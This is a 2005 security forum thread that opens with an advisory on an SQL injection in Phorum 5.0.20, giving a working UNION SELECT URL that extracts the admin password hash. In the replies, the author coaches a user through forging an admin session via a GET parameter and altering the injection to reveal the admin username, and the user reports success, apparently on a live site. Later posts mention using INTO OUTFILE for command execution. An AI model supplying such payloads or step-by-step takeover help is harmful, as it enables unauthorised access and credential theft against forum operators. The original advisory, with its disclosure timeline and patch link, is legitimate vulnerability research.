 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
[waraxe-2005-SA#043] - Sql injection in Phorum 5.0.20 |
 |
 Posted: Fri Nov 04, 2005 9:00 pm |
 |
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
Author: Janek Vind "waraxe"
Date: 04. November 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-43.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phorum 5.0.20
Homepage: http://phorum.org/
What is Phorum?
Phorum is a web based message board written in PHP.
Phorum is designed with high-availability and visitor ease
of use in mind. Features such as mailing list integration,
easy customization and simple installation make Phorum a
powerful add-in to any website.
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Critical sql injection has been found in Phorum 5.0.0.alpha
to 5.0.20. Phorum 5.1.x branch (in alpha stage) seems to be unaffected.
Details
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Problem lies in uninitialized array "$forum_ids" in "search.php" file.
From source code:
----------------[ from source code ]------------------
$forum_ids[$row["forum_id"]] = $row["forum_id"];
$match_number++;
}
$forums = phorum_db_get_forums($forum_ids);
foreach($arr["rows"] as $key => $row){
$arr["rows"][$key]["forum_url"] =
phorum_get_url(PHORUM_LIST_URL, $row["forum_id"]);
$arr["rows"][$key]["forum_name"] =
$forums[$row["forum_id"]]["name"];
}
----------------[ /from source code ]-----------------
This can give as possibilities to "inject" arbitrary data to "$forum_ids"
array by GPC and next let's look at "phorum_db_get_forums()" function from
"include/db/mysql.php" :
----------------[ from source code ]------------------
if (is_array($forum_ids)) $forum_ids = implode(",", $forum_ids);
$sql = "select * from {$PHORUM['forums_table']} ";
if ($forum_ids){
$sql .= " where forum_id in ($forum_ids)";
} elseif (func_num_args() > 1) {
$sql .= " where parent_id = $parent_id";
if(!defined("PHORUM_ADMIN")) $sql.=" and active=1";
}
$sql .= " order by display_order ASC, name";
$res = mysql_query($sql, $conn);
if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql");
----------------[ /from source code ]-----------------
So sql query manipulation seems to be possible. Now let's try this
in real world ...
[------ real life exploit ------]
http://localhost/phorum520/search.php?1,search=a,page=1,match_type=ALL,
match_dates=30,match_forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99)
/**/UNION/**/ALL/**/SELECT/**/1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,21,32/**/FROM/**/phorum_users
/**/WHERE/**/admin=1/**/LIMIT/**/1/*
There are some critical conditions for exploit to be successful.
1. "register_globals" must be "on", so we can poison php variable space
through GPC.
2. "search=a" - this search string must return one or more results.
3. "SELECT/**/1,password" - first number in sql injection, in our case "1",
must be "forum_id" for forum in search results.
4. sql table prefix "phorum_" can be different, but this will give nice sql error
messages and reveal real prefix.
5. Some Phorum versions seems to have different table structure for "phorum_users",
so again, there will be sql error messages. It's easy to overcome this kind of
problem by altering sql injection string as "trial/error".
[----- /real life exploit ------]
See ya and have a nice day ;)
Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
01. november 2005 - vendor first contacted
01. november 2005 - vendor response
02. november 2005 - details emailed to vendor
03. november 2005 - vendor released new, patched version
04. november 2005 - public advisory released
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Download new Phorum version 5.0.21 from:
http://phorum.org/downloads/phorum-5.0.21.tar.gz
More info: http://phorum.org/story.php?57
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to LINUX, Heintz, murdock, g0df4th3r, slimjim100, shai-tan,
y3dips and all other active members from waraxe community !
Tervitused - Raido Kerna !
Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DX expedition database - http://www.dxdb.com/
Hard disc recovery - http://www.hdd911.com/
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------ |
|
|
|
|
|
|
|
|
| Posted: Fri Nov 04, 2005 11:26 pm |
|
|
| Heintz |
| Valuable expert |
 |
|
| Joined: Jun 12, 2004 |
| Posts: 88 |
| Location: Estonia/Sweden |
|
|
|
|
|
|
wee.. great to hear about you Waraxe.
search parts of most software seems to be a bit more complicated then rest of code and more vulnearable.
anyway, great job as usually!!  |
|
_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
| Posted: Sat Nov 05, 2005 12:28 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Thanx, Heintz!
Yes, search part is hard to code properly and securely and as much as
i have seen various messageboards and other scripts, they all are in trouble, when user will try search something with "weird" characters in search string  |
|
|
|
|
| Posted: Sat Nov 05, 2005 11:06 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
I told people, you were back but Im not sure if they believed me. lolz.
AWOL there were rumours you were dead or in prison.
Your good at doing a dissapearing act it seems.  |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Sat Nov 05, 2005 3:52 pm |
|
|
| IGNOR3 |
| Regular user |
 |
|
| Joined: Nov 05, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
Thanx a lot!!
But how can I go to the cpanel without cracking the Hash?? |
|
|
|
|
|
|
|
|
| Posted: Sat Nov 05, 2005 4:44 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| IGNOR3 wrote: | Thanx a lot!!
But how can I go to the cpanel without cracking the Hash?? |
My first idea was to handcraft cookies. But let's look at src code:
| Code: |
function phorum_user_check_session( $cookie = PHORUM_SESSION )
{
$PHORUM = $GLOBALS["PHORUM"];
if ( ( $cookie != PHORUM_SESSION || ( isset( $PHORUM["use_cookies"] ) && $PHORUM["use_cookies"] ) ) && isset( $_COOKIE[$cookie] ) ) { // REAL cookies ;)
$sessid = $_COOKIE[$cookie];
$GLOBALS["PHORUM"]["use_cookies"]=true;
} elseif ( isset( $PHORUM["args"][$cookie] ) ) { // in the p5-urls
$sessid = $PHORUM["args"][$cookie];
$GLOBALS["PHORUM"]["use_cookies"]=false;
} elseif ( isset( $_POST[$cookie] ) ) {
$sessid = $_POST[$cookie];
$GLOBALS["PHORUM"]["use_cookies"]=false;
} elseif ( isset( $_GET[$cookie] ) ) { // should rarely happen but helps in some cases
$sessid = $_GET[$cookie];
$GLOBALS["PHORUM"]["use_cookies"]=false;
}
|
You see? There are many possibilities to deliver admin username and hash, even by $_GET variable 
So try this:
| Code: |
http://localhost/phorum520/admin.php?phorum_admin_session=username:md5hash
|
username is admin username, which one you can pull out from database in same way as md5 hash
And best part of story - you must make this GET request only once, and after that admin cookie will be created and you can administer phorum messageboard as full power admin  |
|
|
|
|
|
|
|
|
| Posted: Sat Nov 05, 2005 5:16 pm |
|
|
| IGNOR3 |
| Regular user |
|
|
| Joined: Nov 05, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Nov 05, 2005 6:39 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
First of all - NO REAL URL-s here!!! This is not allowed in this forum!
Next - admin username is different from that you can see in forum messages. Actually, admin username is secret. But you can use same sql injection to reveal that username.
Just modify injection:
from
| Code: |
... SELECT/**/1,password,3,4,5,6,7,8 ...
|
to
| Code: |
... SELECT/**/1,username,3,4,5,6,7,8 ...
|
And when you use those username and password, then it will work.
By the way, i suggest to use Firefox and before exploiting clear cookies cache (just in case).
 |
|
|
|
|
| Posted: Sat Nov 05, 2005 6:45 pm |
|
|
| IGNOR3 |
| Regular user |
|
|
| Joined: Nov 05, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
WoW!!!
Nice!!
It Worked for me!!
 Good Job Waraxe |
|
|
|
|
| Posted: Sat Nov 05, 2005 6:48 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Nice to hear about success |
|
|
|
|
| Posted: Sun Nov 06, 2005 5:28 am |
|
|
| zer0-c00l |
| Advanced user |
 |
|
| Joined: Jun 25, 2004 |
| Posts: 72 |
| Location: BRAZIL! |
|
|
|
|
|
|
Nice Waraxe!
Its good to know you're alive hehehe |
|
|
|
|
| Posted: Sat Nov 12, 2005 12:20 am |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
wow, nice to see u again waraxe
nice advisories you bring out !
btw, have u tested the exploit by inserting "system <cmd>" so attacker able to gain communication with system (my friends told me about the technique, while im gone away from internet coz of less bandwidth) |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Sat Nov 12, 2005 4:14 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Hi y3dips! Nice to see ya too
Well, do you mean "INTO OUTFILE" methods like this one:
http://www.milw0rm.com/id.php?id=1270
Actually I believe, that in most of the cases there is no "File_priv" privileges available for current mysql user.
Those admins - they are so paranoid in this days |
|
|
|
|
| Posted: Sat Nov 12, 2005 1:08 pm |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
yeah, thats what i mean bro
i agree with u about priv restriction , but somehow there still many 'box' maintain by certified admin (not technicall admin )
i think no need to put it for a play, better for "user" to create their own explo , so u wont bother about vendor reporting
what u are Proof are more than enough |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Tue Nov 22, 2005 2:45 pm |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| exellent job janek |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 108
Members: 0
Total: 108
